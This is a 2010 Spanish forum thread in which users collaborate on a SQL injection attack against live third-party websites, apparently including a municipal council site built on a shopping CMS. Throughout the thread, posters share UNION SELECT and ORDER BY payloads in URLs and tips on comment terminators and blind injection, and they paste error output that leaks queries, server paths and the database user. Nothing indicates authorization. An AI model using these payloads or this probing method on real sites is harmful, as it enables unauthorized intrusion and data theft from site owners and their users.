|
Título: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 20:08 pm Salu2,
Tengo una página que he podido, por lo menos saber las columnas de su base de datos que tiene, está creada en php y core sobre Mysql: http://www.lapaginaweb.com/index.php?contingut=2&codi=-1%20order%20by%205/* Poniendo al final /* me deja ver que hay 5 porque si pongo 6 me peta. El problema está seguir, he provado con: -1+union+all+select 1,2,3,4,5/* Y nada me da este error: No s'ha pogut llegir select * from contingut where codi=-1 union all select 1,2,3,4,5/* Alguien sabe como proseguir.... gracias para la ayuda a un newbaby!!!!! Título: Re: Ayuda como seguir con SQL Inyection Publicado por: WHK en 22 Marzo 2010, 20:45 pm talves porque necesita procesar un valor válido para poder mostrarse.
me da la impresión de que es blind sql o tendrás que ingeniartelas para fabricar una query tan fiel como la original y solo modificando un valor de una columna. PD: el código original no será este? Citar No s'ha pogut llegir select articles2.*, articles2_idioma.text as descr, articles2_idioma.text_curt as text_curt from articles2, articles2_idioma where codi= and id_idioma=2 and codi=id_article Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 20:53 pm Salu2, no se donde has sacado el codigo pero no es este intentare con blind sql, no se si me servirá......... si me puedes aportar algo mas me lo dices mil gracias
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: WHK en 22 Marzo 2010, 21:06 pm Bueno, por lo que he podido averiguar, ese sistema web que observas es un sistema CMS para shopping creado por
http://www.comunicatek.com/ y hay varias por internet. yo mientras tanto pruebo acá y tu pruebas ayá. Ese sitio web debe tener un buscador: http://ejemplo.com/buscador.php?idioma=2 union select user(),2,3 -- u00061@localhost con eso ya podrías inyectar libremente. Lo raro que me fijé en este sistema es que cuando intentas obtener las columnas con order by siempre te retorna un numero mas elevado de columnas que el real, por ejemplo a mi me retornaba que habian 4 columnas pero eran solo 3 al igual que en la tabla de productos, también es resultado menos uno. el resultado queda en el código fuente, no lo verás desde el explorador directamente. Para eso haz view-source:htt://ejemplo... y buscas esto: Código: <option value='33'><option value=' Saludos. Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 21:06 pm De donde has cacado el codigo????
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: WHK en 22 Marzo 2010, 21:07 pm googleando :P y viendo el código fuente, etc
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 21:10 pm No s'ha pogut llegir select * from pdfs where idarticle=-1 order by 6/* and categoria=1 order by codi asc
mmmmmm Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 21:12 pm OK PROVANDO, y como dices tu es de esta gente si !!!
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: WHK en 22 Marzo 2010, 21:13 pm prueba con el buscador como te puse mas arriba
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 21:18 pm no tiene buscador............. buscando mas
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 21:28 pm mmmmmmm en el fichero rss.php?
http://www.*******.info/rss.php?noticies=2%20union%20select%20user%28%29,2,3%20--bisbal@localhost Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/usuaris/bisbal/php/categoria.php on line 127 Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/rss.php on line 27 Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/php/rss10.php on line 77 http://www.******.cat Les últimes notícies de l'Ajuntament http://www.******.cat/index.php?noticies=2&codi=376 PLE ORDINARI DEL 26 DE GENER DE 2010 http://www.********.cat/index.php?noticies=2&codi=374 PLE EXTRAORDINARI DEL DIA 21 DE GENER DE 2010 http://www.******.cat/index.php?noticies=2&codi=364 PLE ORDINARI DEL 27 DE GENER DE 2009 http://www.******.cat/index.php?noticies=2&codi=363 PLE ORDINARI DEL 30 DE JUNY DE 2009 http://www.*********.cat/index.php?noticies=2&codi=361 PLE ORDINARI DEL DIA 22 DE DESEMBRE DE 2009 Título: Re: Ayuda como seguir con SQL Inyection Publicado por: WHK en 22 Marzo 2010, 21:36 pm jajajaja espero que no sea el bisbal que yo conozco o vas a terminar igual que t1z4k jajaja
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 21:42 pm JAJAJAJAJAJ no no lo es jejejejejejejeje mmmm no hay maneras buffff.....
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: WHK en 22 Marzo 2010, 21:43 pm home/usuaris/bisbal/templates_c/contingut.tpl
ese templates_c me recuerda a un post que está mas abajo, me da la impresion de que es el mismo sistema pero estoy inseguro Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 21:50 pm Smarty version 2.5.0 mmmmm
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: WHK en 22 Marzo 2010, 21:53 pm si tratas de hacer una query corrupta te escribe la query pero si la query no es corrupta pero aun así da error entonces sale mysql_error(), en ese caso se puede deducir que está utilizando mysqli o alguna función que verifica la query antes de ser procesada
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 21:55 pm Si eso me he fijado, estoy mirando el cms smarty 2.5.0 en google....
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 21:59 pm que post dices que es similar?????
Gracias Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 22:07 pm Usa mysqli el cms bufffff mas dificil !!!!
Título: Re: Ayuda como seguir con SQL Inyection Publicado por: tragantras en 22 Marzo 2010, 22:31 pm No s'ha pogut llegir select * from pdfs where idarticle=-1 order by 6/* and categoria=1 order by codi asc mmmmmm prueba a poner en vez de Código: /* Código: -- Título: Re: Ayuda como seguir con SQL Inyection Publicado por: nuevaorden en 22 Marzo 2010, 22:33 pm ya he provado antes y me da error siempre , mmmmmm es complejo este smarty
|